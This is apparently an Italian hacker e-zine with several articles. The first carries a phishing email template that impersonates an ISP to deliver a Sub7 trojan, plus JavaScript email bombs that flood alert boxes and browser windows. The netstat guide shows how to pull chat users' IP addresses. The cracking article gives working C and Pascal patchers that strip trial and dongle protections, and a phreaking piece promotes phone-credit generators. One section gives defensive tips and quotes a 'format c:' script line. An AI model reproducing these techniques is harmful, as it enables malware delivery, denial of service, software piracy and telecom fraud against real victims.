Molti lamer inviano fakemail a indirizzi vari con un file .exe allegato,
magari lasciando anche il testo vuoto, sperando nella curiosità/stupidità di
chi riceve l'email.
Ma questo è un sistema che ormai non funziona nemmemo per sbaglio...
Quindi per poter sperare che la vittima esegua il nostro bel server dobbiamo
affidarci ancora una volta al social engineering.

A mio parere la tecnica più affidabile è la seguente:

Inviamo una fake email come spiegato nella seconda tecnica nella sezione (5)
alla vittima spacciandoci per l'ISP che gestisce il suo indirizzo con il
seguente testo:

>Gentile Utente,
> Siamo lieti di informala che da oggi è possibile utilizzare il nuovo
programma di connessione di
> isp.it.
> Il nuovo programma vi permetterà di ottenere connessioni più sicure e più
stabili.
> Tale programma le è stato allegato a questa email, per poterlo utilizzare è
necessario eseguire
> il file allegato e seguire i semplici passi dell'installazione.
> Per eventuali dubbi o domande inviate un email a assist_tecn@isp.it
>
>
> Il Responsabile Tecnico isp.it
> Ing. Mario Monti


(l'indirizzo assist_tecn@isp.it deve essere inventato, di certo non vi
interessa conoscere le lamentele delle vittime =)

Come allegato dell'email inseriremo il server del nostro sub7 avendo cura di
modificare l'icona con quella del vero programma di connessione dell'ISP.
Magari per rendere la cosa quanto meno sospetta possiamo far generare un
messaggio di errore al server di sub7 in modo che l'utente creda che ci sia
stato qualche problema.
Per ottenere le icone dei vari ISP è sufficente trovare un cd di connessione a
internet che viene distribuito nei negozi, per strada, nei giornali.
Tutti gli ISP distribuisco il proprio CD gratuitamente da qualche parte.
Se proprio non riuscite a trovarlo, provate a chiedere a qualche vostro amico
se utilizza quel determinato ISP.
Se anche questa ricerca risulta infruttuosa, provate a vedere sul sito
dell'ISP se è possibile scaricare il loro programma di connessione, in genere
dopo che ci si è registrati si ha tale possibilità.

I trojan non sono l'unico metodo che si ha per nuocere a qualcuno, infatti è
possibile utilizzare anche un semplice linguaggio chiamato javascript, che va
ad interagire con le pagine HTML per aumentarne l'interattività con
l'utente... questo nelle intenzioni iniziali, ma ogni cosa può sempre essere
usata in diversi modi. =)

Se ad esempio nell'email (basata sempre su un HTML) alleghiamo un codice tipo
questo:

<HTML>
<HEAD>
<SCRIPT LANGUAGE="
JavaScript">
function infinito_al()
{
while (true)
window.alert("
PIANGI BaStArDo!!!!")
}
</SCRIPT>
</HEAD>
<BODY> onLoad="
infinito_al()">
.....
.....
.....
.....
</BODY>
</HTML>

Non appena la vittima selezionerà il messaggio verranno generati infiniti box
di alert (quelli con l'icona del punto esclamativo nero nel triangolo giallo)
con la scritta 'PIANGI BaStArDo!!!!' che obbligheranno l'utente a spegnere il
pc, infatti anche la combinazione CTRL+ALT+CANC non può nulla...
La cosa più bella è che il messaggio non può essere cancellato se non quando
il javascript ha terminato il suo compito, ovvero mai... quindi ogni volta che
il messaggio viene selezionato si è costretti a riavviare il pc, quindi
pensate cosa succede se si inviano 20, 30 messaggi uguali, se l'utente non sa
come potersi difendere deve solo cancellare il suo client di posta, in quanto
ogni volta che vi accede almeno uno viene selezionato automaticamente.

Un altro attacco simile. ma molto più crudele può essere il seguente:

<HTML>
<HEAD>
<SCRIPT LANGUAGE="
JavaScript">
function bomba_brw()
{
while (true)
{
window.open("
http://napolihak.da.ru")
}
}
</SCRIPT>

</SCRIPT>
</HEAD>
<BODY onLoad="
bomba_brw()">
.....
.....
.....
.....
</BODY>
</HTML>

In questo caso non appena la vittima selezionerà l'email verranno aperte
infinite finestre a http://napolihak.da.ru
il che come minimo farà cadere la connessione, e come massimo farà crashare il
pc vittima.

Grazie ad un comando javascript si può anche formattare il pc della vittima,
ma non ho intenzione di spiegarlo qui,
sarebbe un informazione troppo preziosa per i lamers.

Entrambe gli attacchi basati su javascript non funzionano su servizi di
webmail, ovvero su con quelli account che si consultano direttamente da
internet, tipo yahoo.

---------------------------------------------------------------------

[7) COME DIFENDERSI]
Questa guida, come detto nel primo disclaimer, è stata scritta per insegnare
gli utenti inesperti a difendersi dagli attacchi lamer.
Tutti gli attacchi descritti sono stati spiegati per poterli facilmente
individuare.
In questa sezione però vi darò altri consigli per poterli prevenire e/o
annullare.

Per quanto riguarda le chat, c'è poco da dire, la diffidenza è l'unica arma,
che però se accompagnata da un buon firewall e da un buon antivirus assicura
una discreta sicurezza.
Logicamente il mio consiglio è quello di non eseguire mai file che ci vengono
date da persone in chat, a meno che non siano nostri amici (reali) di lunga
data.

Per quanto riguarda le email il discorso cambia.
Infatti oltre al solito suggerimento di cestinare all'istante le email di
provenienza sconosciuta contenenti allegati .exe e di utilizzare un antivirus
ci sono altri accorgimenti per prevenire attacchi basati su script allegati
alle mail.
Se infatti si subisce un attacco basato su un javascript basta riavviare il
pc, eseguire Internet Explorer e andare in OPZIONI-->PROTEZIONE-->PERSONALIZZA
LIVELLO e disattivando controlli e plug-in Active-X e esecuzione script.
Poi riavviare Outlook e selezionare il messaggio "
infetto", questa volta però
non accadrà niente e potremo cancellarlo liberamente.
Un consiglio generale è anche quello di rinominare i files comando più
pericolosi come i seguenti:

format.com --> form.com
deltree.exe --> dt.exe

tali files sono contenuti nella cartella windows\command\ e possono essere
rinominati col seguente comando:

c:\>rename comando.xxx nuovo_nome.xxx

dove xxx è l'estensione del file.
In tal modo eventuali tentativi di formattarci il disco rigido non avranno
successo in quanto nello script ci sarà una riga di questo genere:
comando_js("
format c: /q /autotest >> NULL")
che otterrà come risultato solo un misero "
comando o nome di file non valido"
=)

---------------------------------------------------------------------

[8) GLOSSARIO]

-Script CGI(Common Gateway Interface):, script che permettono al client di
comunicare con il server per determinate azioni più o meno complesse (come ad
esempio un operazione di login oppure una ricerca di un termine).

-Fake mail: email fasulla, che nasconde l'identità di chi la manda
sostituendola con un'altra inventata da chi la invia.

-ISP: Internet Service Provider, ovvero fornitore di servizi internet, sono
quelle società che offrono collegamenti a internet e servizi connessi come ad
esempio una casella email, uno spazio per il proprio sito, ecc...

---------------------------------------------------------------------

[9) NOTE FINALI]

Per chi volesse discutere (civilmente) degli argomenti trattati in questa
guida è possibile contattarmi tramite i recapiti indicati nella parte iniziale
del file e tramite il forum del sito http://napolihak.da.ru .
Mi raccomando tenete d'occhio il sito tra breve altre nuove guide!

M3xican


|---------------------------------------------------|
|Art. N° <10> : "
Netstat" di Tricker (trad. M3xican)|
|---------------------------------------------------|


*%* _.|~~|._ | ~~~~)\~~~/ /~~~~~| |~~| /~~/ |~~~~~~~/ | ~~~~) *%*
*%* |__ __| | @ / | | | /~~~ | |/ / | |~~~~~ | @ / *%*
*%* | | | |\ \ | | | | | < | |_____ | |\ \ *%*
*%* |__| |_| \_\ | | | \____ | |\ \ | _____\ |_| \_\ *%*
*%*%*%*%*%*%*%*%*%*%*/~ ~\ \_____/ |__| \__\ | |_____ *%*
*%*~~~~~ * TrickSoft.net * |______/ *%*%*%*%*%*
*%*%*%*%*%*%*%*%*%*%*%*%*%*%**%*%*%*%*%*%*
(Cadtrick@hotmail.com) -
Data:giugno,01,2000
----------------
Info conatatti:
----------------
Scritto da: TriÇker
(con alcune lievi modifiche di R a v e N)
Email:Cadtrick@hotmail.com
ICQ:40884568
AIM:zTrickerz
Web:http://tricksoft.net
TRADOTTO DAL: M3xican (ilmessicano@inwind.it)
web:http://napolihak.da.ru


Titolo: informazioni su IP e porte usando Netstat
-------------------------------------------------------

Indice dei contenuti:
-------------------------------------------------------
INTRODUZIONE
I. Uso di Netstat
II. Individuazione delle porte aperte
III. SYN e ACK
IV. Usando Netstat per ICQ e AIM
V. Altri usi
VI. strumenti e accessori
VII. Due trucchi veloci
CONCLUSIONE

-------------------------------------------------------
INTRODUZIONE
-------------------------------------------------------
Salve grazie per stare leggendo questo testo per imparare di più sull'uso di
netstat affinchè ti sia di aiuto.
Per favore non curarti di qualsiasi errore di ortografia, punteggiatura o
grammaticale.
Questo testo è scritto in modo che anche il lettore medio lo possa
comprenderlo.
Non per complicarlo. Per favore siate liberi di inviarmi email.

-------------------------------------------------------
I. Uso di Netstat
-------------------------------------------------------
- (Per aprire netstat) - Per aprire Netstat devi fare come segue:
Clicca sul pulsante [avvio] --> poi clicca su [programmi] --> poi cerca
[prompt di Ms-Dos].
Netstat è uno strumento davvero utile che ha molti usi. Io personalmente uso
netstat per prendere gli indirizzi IP di altri utenti con cui sto parlando su
ICQ o AIM. Puoi usare netstat anche per monitorare l'attività delle tue porte
contro aggressori che inviano richieste di syn (parte del TCP/IP
3-way-handshake) o solo per vedere quali porte stanno in attesa/in
collegamento. Guarda l'esempio sotto per una rappresentazione media di una
risposta alla digitazione di [netstat] al prompt 'c:\'

~~~~~~~~~~~~~~~~~~~~~~~~
C:\WINDOWS>netstat

Active Connections

Proto Local Address Foreign Address State
TCP pavilion:25872 WARLOCK:1045 ESTABLISHED
TCP pavilion:25872 sy-as-09-112.free.net.au:3925 ESTABLISHED
TCP pavilion:31580 WARLOCK:1046 ESTABLISHED
TCP pavilion:2980 205.188.2.9:5190 ESTABLISHED
TCP pavilion:3039 24.66.10.101.on.wave.home.com:1031 ESTABLISHED
~~~~~~~~~~~~~~~~~~~~~~~~

Adesso guarda sull'esempio. Vedrai [Proto] nell'angolo in alto a sinistra.
Questo ti dice se il protocollo è TCP/UDP ecc. Affianco a destra vedrai [Local
Address] questo ti dice le porte aperte dell'hostname/IP locale.
Ancora più a destra vedrai [Foreign Address] questo ti darà l'IP/hostname
della persona e la porta nel formato dell'IP: porta con "
:" nel mezzo tra
porta ed IP/hostname.
E alla fine vedrai [state] che semplicemente dichiara lo stato della
connessione.
Questo può essere ESTABLISHED(stabilita) se si è connessi o LISTENING se si è
in attesa di una connessione.
Adesso con queste conoscenze ci tufferemo nel profondo di come usare questo
comando per il monitoraggio dell'attività delle porte e la scoperta di porte
aperte in uso.
-------------------------------------------------------

-------------------------------------------------------
II. Individuazione delle porte aperte
-------------------------------------------------------
Adesso stai notando che qualcosa di buffo sta accadendo sul tuo computer? Lo
sportellino del tuo lettore cd-rom sta diventando pazzo... aprendosi e
chiudendosi benchè tu non faccia niente. E tu dirai che cazzo sta
succedendo... oppure capirai che qualcuno si stia divertendo con un trojan sul
tuo computer.
Adesso il tuo obbiettivo è localizzare quale trojan sia per poterlo rimuovere
giusto? Bene hai ragione.
Allora vai al prompt di ms-dos. Ora ci sono molti modi di usare netstat e
sotto c'è un menu di aiuto. Esaminalo.
~~~~~~~~~~~~~~~~~~~~~~~~
C:\WINDOWS>netstat -?

Visualizza statistiche su protocollo e connessioni di rete TCP/IP correnti.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [intervallo]

-a Visualizza tutte le connessioni e le porte di ascolto.
-e Visualizza le statistiche Ethernet. L'opzione può essere
associata all'opzione -s.
-n Visualizza gli indirizzi e i numeri di porta in forma numerica.
-p proto Visualizza connessioni del protocollo specificato da 'proto';
'proto' può essere TCP o UDP. Se usato con l'opzione -s per le
statistiche, 'proto' può essere TCP, UDP, o IP.
-r Visualizza la tabella di routing.
-s Visualizza le statistiche per protocollo. Per impostazione
predefinita, le statistiche sono visualizzate per TCP, UDP
e IP; l'opzione -p può essere utilizzata per specificare
un sottoinsieme dell'impostazione predefinita.
intervallo Rivisualizza le statistiche selezionate, interrompendo
per un numero di secondi pari a "
intervallo" tra ogni
visualizzazione. Premere CTRL+C per fermare la visualizzazione
delle statistiche. Se omesso, netstat stamperà le informazioni
di configurazione correnti una sola volta.
~~~~~~~~~~~~~~~~~~~~~~~~
Io personalmente preferisco usare (c:\windows\netstat -an) che mostra tutte le
connessioni e le porte aperte nella forma dell'IP invece che dell'hostname.
Così come puoi notare come abbia usato il comando: netstat -a(mostra tutte le
connessioni e le porte in attesa.)n(in formato numerico(IP))
nestat -an -così facendo vengono eseguite le due opzioni alla volta senza
bisogno di dover scrivere -a-n. Adesso che sai come usare netstat per per
vedere tutte le tue connessioni e le porte in attesa puoi ricercare porte
comuni come 12345 (vecchio trojan netbus), 1243(vecchio subseven) ecc.. questo
diventa molto utile per ogni cosa che scoprirai.
Prenditi una pausa adesso e datti una calmata sul tuo divano e rilassati per
circa 5 minuti e lascia tutto questa sudata per il ritorno pronto ad imparare
di più. :)

-------------------------------------------------------
III. SYN e ACK
-------------------------------------------------------
Quando senti SYN e ACK(ACKnowledge) tu non pensi alla comunicazione dei
pacchetti sul tuo sistema.
Bene, lasciami dire cosa fanno SYN e ACK.

[SYN] - SYN in parole comuni è una richiesta per una connessione usata
nell'handshake 3-way nel TCP/IP. Quando tu mandi una SYN per una connessione,
il computer obbiettivo risponderà con una SYN o una ACK. Così principalmente
quando vedi nella colonna [state] SYN significa che stai mandando una
richiesta per connetterti a qualche cosa.

[ACK] - Adesso l'ACK è la conferma di ricevuta alla richiesta fatta da un
computer che sta provando a connettersi con te. Una volta che una SYN ti è
stata mandata tu devi rispondere con un ACK, poi mandare indietro un altra SYN
al computer che richiede la connessione per confermare che il pacchetto
inviato era corretto.
Spero di averti aiutato a capire un pò di più SYN e ACK. Se hai ulteriori
domande prova a cercare testi sul TCP/IP.
Adesso andiamo nelle cose divertenti.

-------------------------------------------------------
IV. Usando Netstat per ICQ e AIM
-------------------------------------------------------
Avete mai provato a prendere qualche indirizzo IP o hostname usando [AIM] o
[ICQ]? Bene siete fortunati.

[AIM] - Con AIM non puoi generalmente trovare l'esatto indirizzo IP senza
alcune prove e errori poichè la maggior parte del tempo sembra collegare tutti
gli utenti online sulla porta 5190. Così meno utenti sono online più è facile.
Allora, vai al prompt di ms-dos e digita netstat -n lì, vedrai sotto [Foreign
Addressess] un IP:con la porta 5190. Adesso uno di quegli IP che è connesso
con te sulla porta 5190 diventerà il tuo utente bersaglio su AIM. Solo prove e
errori per cercare sono generalmente il metodo più facile.

[ICQ] - per prendere un IP di un utente di ICQ usando netstat è facile. PRima
di di parlare con la persona su ICQ devi aprire il prompt di ms-dos e fare il
netstat -n per vedere tutti gli IP e le porte.
Prendi nota o copiali da qualche parte così che li possa ricordare in seguito.
Adesso è il momento di trovare questo IP. Manda un messaggio all'utente con un
singolo messaggio e adesso velocemente fai netstat -n. Avrai una nuova linea
aggiunta di un indirizzo IP, adesso cerca per quello nuovo nella colonna
[Foreign Addressess] e una volta che l'avrai trovato hai l'ip del tuo amico
senza patch o hackeraggi. Semplice abilità :P.

-------------------------------------------------------
V. Altri usi
-------------------------------------------------------
Netstat può essere usato per prendere gli IP di ogni cosa e ognuno, ogni volta
che c'è una connessione diretta tra te e il bersaglio (es. messaggi diretti,
trasferimenti di files o chat ICQ su ICQ, chat DCC (Direct Client Connection)
o chat e trasferimenti di files su irc ecc..).

-------------------------------------------------------
VI. strumenti e accessori
-------------------------------------------------------
Port scanning: per cercare una qualsiasi porta aperta su un computer:
- [7th Sphere Port scanner] - (2 siti mirror nel caso che un link non
funzionasse)
- http://members.xoom.com/Cryptog/7spereportscan.exe
- http://members.xoom.com/gohan_3/7spereportscan.exe
Firewall per monitorare porte e il registro:
- [Lockdown 2000]
- http://www.lockdown.com
Per comunicare meglio:
- [ICQ]
- http://www.icq.com
- [Aol Instant Messanger]
- http://www.aol.com

Netstat con interfaccia grafica:
- [X-netstat]
- http://spazioweb.inwind.it/m3xican/pagine/download/vari.htm

-------------------------------------------------------
VII. Due trucchi veloci
-------------------------------------------------------
a. Alcune volte netstat può generare liste molto lunghe, che sono specialmente
confuse per i newbies. Se tu stai avendo difficoltà, esegui solo netstat, e
poi fai una connessione diretta di qualsiasi genere col tuo bersaglio , o
fallo connettere a te (ICQ, IRC, ecc.. ti sei fatto un idea) ed esegui netstat
ancora. Ci dovrebbe essere una nuova linea, questo è quello che stai cercando.

b. Se l'output di netstat è troppo lungo, digita 'netstat -an >
c:\directory\file.txt' (senza le virgolette, e puoi rimpiazzare i parmetri -an
e il nome del file e il suo percorso con qualsiasi cosa tu voglia). Questo
scaricherà l'output su quel file per una lettura semplice, e ti permetterà
anche di eseguire un copia & incolla.

-------------------------------------------------------
CONCLUSIONE
-------------------------------------------------------
Io penso che sia una cosa migliore comprendere internet che usare degli
strumenti che trovi.
Impara come fare le cose manualmente così comprenderai completamente cosa sta
accadendo. Questo alimenterà il tuo potere e ucciderà la tua debolezza :)

-Tricker



==================================================================
Questa guida è stata tradotta dal M3xican ( ilmessicano@inwind.it ),
se considerate la traduzione scadente o vi volete
cimentare nell'impresa potete scaricare la versione originale
in inglese sempre su <http://napolihak.da.ru>.



############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| C R A C K I N G |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"
1010
01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


|-------------------------------------------|
|Art. N° <11> : "
Scriviamo una patch" di e4m|
|-------------------------------------------|


______________ ________ ________
/ \ /\ \ \ / /
| _______| / \ | \ / |
| |________ / \ | \/ |
| \ / / | || |
| _________/ / /_______ | || |
| |_______ / \ | || |
| | /________ ___\ | || |
\______________/ | | / /\ \
|___| ---------- ----------
AscII by e4m


---==> Best Wiew with "
Terminal" =) <==---

------------------------------------------------------------------------

Allora ... ;) Questa guida vi spieghera' un po d' (ingegneria inversa :)
Quante volte vi siete kiesti... Ora la parte ke mi seriva l'ho trovato,ma
ora vorrei creare una patch,sia per distribuirla (non ve lo consiglio)...
volete crearvela per usi e scopi personale..Bhe volete farvi un Crack!!!
Usermo dei linguaggi di programmazione molto semplici e veloci.
L'asm (il piu' veloce,si consumano poke righe poki bytes =)...Il c (il piu'
completo :) Il pascal (molto curioso =)... anke se dobbiamo lavorare in dec)
Comincio con una sorta di disclaimer.. nessuno parla mai di +ORC..bhe io
lo faro': "
If you give a man a crack he'll be hungry again
tomorrow, but if you teach him how to crack, he'll
never be hungry again" ....
....Piaciuta?? a me dice molto,non so voi !! Incominciamo subito subito con
il c :) GENE

  
RIC PATCH PROGRAM:
Ecco qui il nostro amico c .. da compilare con linux con il terminale :)
gcc programmanostro.c -o programmanostro ...oppure usiamo il compilatore della
Borland " Borland C++ 3.1 o superiore".
Modificando le righe opportune, lo si puo' adattare a qualsiasi programma da
patchare.

/*--------------------------------- LIBRERIE --------------------------------
---------------------------------------------------------------------------*/

#include <conio.h>
#include <dir.h>
#include <dos.h>
#include <stdio.h>
#include <string.h>

/*------------------------------- DICHIARAZIONI -----------------------------
---------------------------------------------------------------------------*/

// inserire il nome del file da patchare tra le " "
#define FC "prgamma.exe"

// inserire il nome del programma tra le " "
#define NAME "Proggetto 1.0"

// inserire il tipo di programma tra le " "
#define TIPO "studios"

// inserire il tipo di protezione tra le " "
#define PROTECTION "Trial 30 days."

// inserire la lunghezza in byte del file da patchare
#define DIMFILE 3364864l // Non toccare la l in fondo!!!

// inserire l'offset dell'istruzione da patchare.
// nel caso di piu' istruzioni definire altre variabili offset1, offset2 ecc.
#define OFFSET 0x00003b13

/*--------------------------------- PROCEDURE -------------------------------
---------------------------------------------------------------------------*/


void Logo(void)
{
textcolor(LIGHTCYAN);
cprintf(" ========================================================\n\r");
cprintf(" ----------===> Generic Patch Program v 1.0 <===---------\n\r");
cprintf(" ========================================================\n\r");
textcolor(LIGHTBLUE);
cprintf("\n ---------------===> Written by e4m<===---------------\n\r");
textcolor(BLUE);
cprintf(" ----===> member of Black Force Crew (#bfc) <===----\n\n\r");
textcolor(DARKGRAY);
}

/*---------------------------------------------------------------------------
------------------------------ PROGRAMMA MAIN -------------------------------
---------------------------------------------------------------------------*/


int main(void)
{ FILE *FileCrack;

unsigned char c;

clrscr();
Logo();
cprintf("ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\n\r");
cprintf(" PRoGRaM | %s\n\r",NAME);
cprintf(" TyPe | %s\n\r",TIPO);
cprintf(" PRoTeCTioN | %s\n\r",PROTECTION);
cprintf("ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\n\r");

//---- Esiste ? -----}
ffblk *dati;
char *FileName;
int result;

strcpy(FileName,FC);

result=findfirst(FileName,dati,FA_RDONLY | FA_HIDDEN | FA_ARCH | FA_SYSTEM);

cprintf(" Searching for %s ....",FC);
for (int i=0;i<12-strlen(FC);i++)
cprintf(".");
delay(500);

if (result) { // Findfirst ritorna 0 quando va a buon fine
cprintf("%s not found !!\n\n\r",FC);
return(1);
}
else
cprintf("OK.\n\r");


//{---- Versione ----}

cprintf(" Checking FiLE Version .........");
delay(500);

if (dati->ff_fsize==DIMFILE)
cprintf("OK.\n\r");
else {
cprintf("Invalid Version !!\n\n\r");
return(2);
}

//{---- Cracking ---- }

FileCrack=fopen(FileName,"rb+");
cprintf("\n Cracking FiLE .");

for (i=0;i<16;i++) {
delay(80);
cprintf(".");
}

/* le righe che seguono dipendono da quanti byte devi cambiare.
In questo caso 1 Byte. Se devi cambiare piu' byte, basta copiare queste
righe per il numero di byte che ti servono. Fai attenzione a cambiare
OFFSET con OFFSET1, OFFSET2, ecc. */



fseek(FileCrack,OFFSET,SEEK_SET);
fread(&c,sizeof(unsigned char),1,FileCrack);

// "c" e' il byte da cambiare, ovviamente in esadecimale.

if (c==0x74) // controlla se e' gia' patchato
cprintf("Already Cracked !!\n\r");
else {
c=0x74;
fseek(FileCrack,-1,SEEK_CUR);
fwrite(&c,sizeof(unsigned char),1,FileCrack);


cprintf("Done.\n\r");
}
fclose(FileCrack);
getch();
return(0);
}
// ú---------==> finez <==----------ú




Piaciuto?? come si puo' ben notare e' molto flessibile e veloce :)
Passiamo al pascal :D Ricordate tutto in dec ;P

------------------------------------------------------------------------------------

{$I-}

(* Ecco una facile facile patch da compilare con TURBOPASCAL7 *)

uses
dos, crt;


var
f : file of char;
c: char;
filnam: string [80];
filsiz: longint;
size: longint;
a, i, x : integer;
procedure drawscreen;
begin

writeln ('
----------------------------------------------------------------------------');
write (' - ');
gotoxy (69,2);
writeln (' -');
gotoxy (1,3);
writeln ('
----------------------------------------------------------------------------');

textcolor (8);
gotoxy (10,2);
write ('General Purpose Patcher 1.0 - Written by e4m ');
delay (140);
gotoxy (10,2);
textcolor (7);
write ('General Purpose Patcher 1.0 - Written by e4m ');
delay (140);
gotoxy (10,2);
textcolor (15);
write ('General Purpose Patcher 1.0 - Written by e4m ');
delay (140);
textcolor (7);
writeln;writeln;writeln;
write (' ');
textcolor(15);
write ('[PrOgRaM NaMe] : ');
textcolor (7);
(* Scrivere nome prog.*)
writeln ('programmino :) ');
write (' ');
textcolor(15);
write ('[PaTcH DoNe By] : ');
textcolor (7);
(* Scrivere l'autore della patch. *)
writeln ('e4m ');
write (' ');
textcolor(15);
write(' [FiLe T0 RaPe] : ');
textcolor(7);
(* Scrivere il nome del file da patchare *);
writeln ('progz.exe ');
write (' ');
textcolor (15);
write (' [TyPe 0f PaTcH] : ');
textcolor (7);
(* Scrivere la modalita' della patch *)
writeln ('Dongle Crack -100%- ');
write (' ');
textcolor (15);
write (' [ReSuLtZ] : ');
textcolor (7);
(* Scrivere il risultato della patch ottenuta *)
writeln ('tnx to bfc ^_- ');
write (' ');
textcolor (15);
write (' [ByTeZ ChAnGeD] : ');
textcolor (7);
(* Scrivi qui i byte cambiati :) *)
writeln ('2 ');
write (' ');
textcolor (15);
write (' [NoTeZ] : ');
textcolor (7);
(* Scrivere le note (come applicare la patch ...ad esempio *)
writeln ('Run this patch in your progz directory to crack it. ');
write (' ');
write (' ');
writeln ('Personally, i see my patch more stable than others, bcoz');
write (' ');
write (' ');
writeln ('using it there are less "General Protection Errors". ');
write (' ');
write (' ');
writeln ('But, try it yourself.......');
writeln;
writeln;

end;

begin
clrscr;
drawscreen;
assign (f, 'prog.exe'); (* Nome del file patchato*)
filnam := 'prog.exe'; (* Nome del file da patchare*)
filsiz := 2478080; (* Grandezza del file da patchare*)
reset (f);
size := filesize (f);
a := IOResult;

if a <> 0 then (*Errore..file nn trovato*)
begin
sound (220);
delay(120);
nosound ;
writeln ;
textcolor (15);
write ('Error 1:');
textcolor (7);
write (' File ',filnam);
writeln (' not found. Check your directory.');
writeln;
halt (1)
end else (* File trovato ma la sua grandezza nn corrisponde*)
begin
if size <> filsiz then
begin
sound (220);
delay (120);
nosound;
writeln;
textcolor (15);
write ('Error 2:');
textcolor (7);
write(' File ',filnam);
write (' must be ',filsiz);
writeln (' bytes long.');
writeln (' Probably you have an incorrect/packed version.');
writeln;
halt (1);
end else




(*Passiamo alla patch !*)
(*Vediamo se il file e' gia' patchato..*)
seek (f,585299); (*File offset del byte 1*)
read (f,c);
if c <> #116 then (*Questo e' il valore originale del byte 1 (in
decimale!!!)*)
begin (*Qui patchiamo il file ;)*)

(*IN QUESTO ESEMPIO CAMBIEREMO 3BYTE *)
(*SE DEVI MODIFIKARE PIU' BYTE BASTA COPIARE + VOLTE QUESTO CODICE ;)*)
(*VA TUTTO IN DEC AVETE IN MENTE IL VLORE NOP (90) ?? BHE IN DEC #116 ;)
BASTA PRENDERE LA CALC. DI WIN *)
(*IN QUESTE LINEE L'ORIGINALE VALORE DEI BYTE*)

seek (f, 585299); (* File offset del byte 1*)
c := #116; (* Byte da scrivere *)
write (f, c);

seek (f, 585300); (* File offset del byte 2*)
c := #2; (* Byte da scrivere*)
write (f, c);

sound (220);
delay (120);
nosound;
writeln ('File already patched. Now, back to original state.');
writeln;
end else


begin
seek (f, 585299); (* File offset del byte 1*)
c := #144; (* Byte da scrivere *)
write (f, c);

seek (f, 585300); (* File offset del byte 2*)
c := #144; (* Byte da scrivere *)
write (f, c);

sound (220);
delay(120);
nosound ;
writeln ('File successfully patched.');
writeln;
end;
end;
end.

----------------------------------------------------------------------------------------------------

Benissimo :D ..troppo carino il pascal ihih eh...lo so e' palloso prendere la
cal e fare tutto in dec ..
e' questione di gusti ..xo' ce ne ho messo x capirlo :) Ora vi piacerebbe
l'asm :) Visto ke e' il mio linguaggio
preferito anke se nn so un H ;) Non saprei come scriverlo correttamente faro'
di sicuro qlc errore :) ma...

Comiciamo coi preliminari da compilare con MASM (consigliato da e4m) ;DDD non
e' vero
Debbuggate con tasm32 (ma nn serve in questo caso!!!!)
- Comprarvi MASM al modico prezzo di 300.000 lire

>Oppure<

- Usare un compilatore di Linux scaricabile gratuitamente da Internet se non
già
compreso nella versione da utilizzare. :)

>Quale scegliere??uhm ke dubbio!!!<

Poi andare in qlc chan e farsi aiutare ke ne so!! su azzurra #asm il chan dei
miei asm amicy ^_^
Oppure imparare qlc in piu di me :)


Non so da voi ma qui nevica ;) ke palle non posso incontare piu la ragazza di
stammattina (povero me ecco questa e' la mia vita na Merda!!)
W autogestioneeeeeeee continuiamo fino a natale 2001 ;) Saluto tutti quelli
ke mi conoscono (cosi' faccio prima)..
NON MANCATE AL MEETING (Prossimamente ad ancona) ..BFC 4EVER
Byz buon nataleeeeeeeeeeeeeeee all

e4m
Tezkatlipoka@libero.it
#bfc on azzurranet
www.bfc.too.it


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| P H R E A K I N G |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


[Commento di Elektro: sicuramente i due articoli che seguono sul Phreaking
scritti da me non sono poi chissà cosa... Forse sono solo lamerate.. boh..
Comunque se avete già sentito parlare abbastanza di segreterie telefoniche e
di telefonare gratis con i cell, saltate a piè pari questi due articoli,
perchè molto probabilmente queste cose le avete già sentite dire o lette da
qualche altra parte... Poi non dite che non ve l'avevo detto...]


|------------------------------------------------|
|Art. N° <12> : "Scroccare con i Cell" di Elektro|
|------------------------------------------------|


$CR0CC@RE CON iL C3LL

<Titolo: Scroccare con i cell v 1.0>
<Autore: Elektro>
<E-mail: teo1987@libero.it>
<Web: www.mondohackers.cjb.net>
<Data: 14.15 23/07/01>
<Barzeletta che mi viene spontanea ricordare in questo articolo: ---> Telecom
: 100 anni di monopolio. Quanti di galera, ladri fottuti?>
<Musica: Radio Company Dance>

*********
* INTRO *
*********

In questo articolo vi parlerò ancora una volta di phreak (se non l'avevate
capito ;-)) e specificatamente di come telefonare gratizz con i cell. Ma prima
di introdurvi nella lettura di questo articolo leggetevi bene il disclaimer.

**************
* DISCLAIMER *
**************

Non mi assumo nessuna responsabilità sull'uso illegale, dannoso e/o scorretto
nell'applicazione delle informazioni contenute in questo articolo. Se vi
beccano e qualcuno vi fa il culo (o qualcos'altro di peggio...), sono solo
affari vostri, io pubblico questo articolo con unico scopo educativo,
informativo e didattico per dimostrare gli eventuali sistemi e metodi per
telefonare gratis ma non mi ritengo responsabile delle vostre azioni dopo la
lettura di questo articolo.

****************************************
* VARI METODI E LEGGENDE METROPOLITANE *
****************************************

Quest'oggi voglio analizzare più metodi possibili su come poter fregare le
compagnie telefoniche e telefonare gratizz. Prima però vorrei premettere che
molti (per non dire quasi tutti) sistemi e metodi per fare tutto ciò, sono
solo balle cosmiche che non funzioneranno mai. Perciò non mettetevi in testa
che una volta terminata la lettura di questo articolo, potrete scroccare tutte
le telefonate che volete...

GENERATORI DI RICARICHE
-----------------------

Oramai li trovate un po' dappertutto... Al massimo se non li avete mai visti,
andate al mio sito (www.mondohackers.cjb.net sezione Phreacking) e
scaricateveli (disponibili quelli per Tim, Omnitel e Wind). Questi programmini
(100 Kb al massimo) vi generano i codici per ricaricarvi il cell senza andare
a comprarvi la tanto famosa ricarica e spendere 50 carte come minimo...
